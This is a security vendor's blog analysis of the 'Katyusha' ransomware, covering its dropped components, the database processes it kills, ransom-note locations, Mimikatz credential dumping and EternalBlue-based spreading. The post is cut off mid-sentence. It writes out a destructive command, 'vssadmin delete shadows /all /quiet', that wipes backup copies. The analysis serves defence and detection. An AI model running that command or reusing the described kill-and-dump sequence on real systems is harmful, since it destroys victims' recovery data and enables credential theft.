Sophisticated Ransomware : “Katyusha”

Credit to Author: Ghanshyam More| Date: Fri, 14 Dec 2018 10:59:58 +0000

Estimated reading time: 6 minutesFor several months, Quick Heal Security Labs has been observing an increase in ransomware, we have found one more interesting ransomware which encrypts files and adds extension “.katyusha” and demands for an amount of 0.5 btc within three days and threatens to release the data to public download if the ransom is not paid. Malware is bundled with many components including using “Double pulsar” and “Eternal blue” exploit which is used to get spread over the network. Also, uses a unique attack technique called “squiblydoo” to  spread over the network. The infection vector for this ransomware is still not confirmed, but on the basis of attribution this ransomware may enter the system via spear phishing, malvertising, spam mail, SMB exploit etc. Technical Analysis: This malware is packed with MPRESS(v2.19) and present on victim’s system with the name “katyusha.exe” at “%temp%”. It contains three components. On execution it drops them into C:WindowsTemp and starts their execution: Svchost0.bat Zkts.exe Ktsi.exe Katyusha checks for following files on the system to determine whether the system is already infected or not. “C:_how_to_decrypt_you_files.txt” “C:ProgramData_how_to_decrypt_you_files.txt” If a system is already infected, Katyusha creates a batch file (svchost0.bat) which contains code as shown in Fig.1. to delete self-copy and terminate itself. If the system is not infected then it drops zkts.exe and ktsi.exe and executes them. Fig 1: Content of Svchost0.bat   Zkts.exe: This file is 7zip compressed executable and main component which contains multiple sub-modules like network spreading module, password stealing module, etc. On the execution of zkts.exe, it extracts components in “C:WindowsTemp” such as Mimikatz, katyusha.dll, eternal blue exploit, etc. those are later used by Katyusha to perform an activity. Fig 2.Files Dropped by zkts.exe   Ktsi.exe (Encryptor): This is another main component which is also MPRESS packed file. It is mainly used for file encryption and to drop ransom note on the victim’s system. This process is started independently by main payload (katyusha.exe) as shown in Fig 3. Fig 3: Call to CreateProcess() for ktsi.exe On the execution of ktsi.exe, it firstly kills list of following tasks to release handles of files which are locked by relevant processes to encrypt(such as db files, etc) as shown in Fig 4. To encrypt database related files successfully, ktsi kills processes which are related to database applications. Below is the list of processes hard-coded in malware: mysqld.exe  httpd.exe  sqlsevr.exe sqlwriter.exe  w3wp.exe  sqlagent.exe fdhost.exe  fdlauncher.exe  reportingservicesservice.exe omtsreco.exe   tnslsnr.exe   oracle.exe emagent.exe  mysqld-nt.exe Fig 4: Taskkill command execution. After the taskkill operation malware drops ransom note in html and txt format at below path to make it visible for all users at system startup, “C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup” _how_to_decrypt_you_files.txt _how_to_decrypt_you_files.html In “C:ProgramData” and at the root of C drive(C:) drop only ransom note as “_how_to_decrypt_you_files.txt”. Fig 5: Ransom Note Ktsi.exe also deletes shadow copy by executing the following command, “vssadmin delete shadows /all /quiet” Fig 6: delete shadow copy After all these tasks, ktsi.exe starts file encryption (RSA) with the help of standard encryption method of CRYPTOGAMS. Signatures related to this algorithm are found in a file, as shown in Fig 7. Fig 7: Cryptogams strings. It encrypts all extension files except the following one, Fig 8: Excluded Extensions from encryption. It also contains an exclusion list of files and folders (as shown in fig 9) if found these words in enumerated file path then it will exclude that path from encryption. To perform uninterrupted encryption, list contains names of few security products. Fig 9: Exclusion list of Files and Folders. Spreading Mechanism: For network spreading, files extracted from zkts comes in role. Please refer Fig 2 for extracted components. m32.exe and m64.exe are Mimikatz tool which are used to fetch credentials from windows lsass.exe. Firstly, katyusha.exe determine whether the system is 64bit or 32bit using system call IsWow64Process (it returns a nonzero value if the system is 64 bit) and executes Mimikatz according to system architecture. Mimikatz tool drops following files at “C:WindowsTemp” as output. – snamelog :  contains fetched usernames. – spasslog :  contains passwords for respective fetched usernames. Fig 10: Check to determine system type and start Mimikatz. After execution of mimikatz, katyusha.exe reads usernames  from snamelog and passwords from spasslog which are used to perform brute force attack into the…
http://blogs.quickheal.com/feed/